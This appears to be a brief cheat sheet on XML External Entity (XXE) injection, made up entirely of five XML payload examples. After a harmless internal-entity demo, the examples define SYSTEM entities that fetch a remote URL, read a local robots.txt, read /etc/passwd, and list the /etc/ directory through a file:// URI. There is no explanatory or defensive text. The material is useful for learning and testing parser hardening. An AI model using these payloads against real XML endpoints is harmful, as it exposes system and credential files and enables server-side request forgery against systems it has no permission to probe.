XML External Entity (XXE)

example 1

<?xml version="1.0"?>
<!DOCTYPE change-log[
        <!ENTITY myName "Michal">
        <!ENTITY mySurname "Szalkowski">
        ]>
<change-log>
    <text>&myName; &mySurname;</text>
</change-log>

example 2

<?xml version="1.0"?>
<!DOCTYPE
        change-log [
        <!ENTITY systemEntity SYSTEM "http://blog.michalszalkowski.com/feed/">
        ]
        >
<change-log>
    <text>&systemEntity;</text>;
</change-log>

example 3

<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "robots.txt">]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>

example 4

<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM "/etc/passwd">]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>

example 5

<?xml version="1.0"?>
<!DOCTYPE change-log [<!ENTITY systemEntity SYSTEM 'file:///etc/'>]>
<change-log>
    <text>&systemEntity;</text>;
</change-log>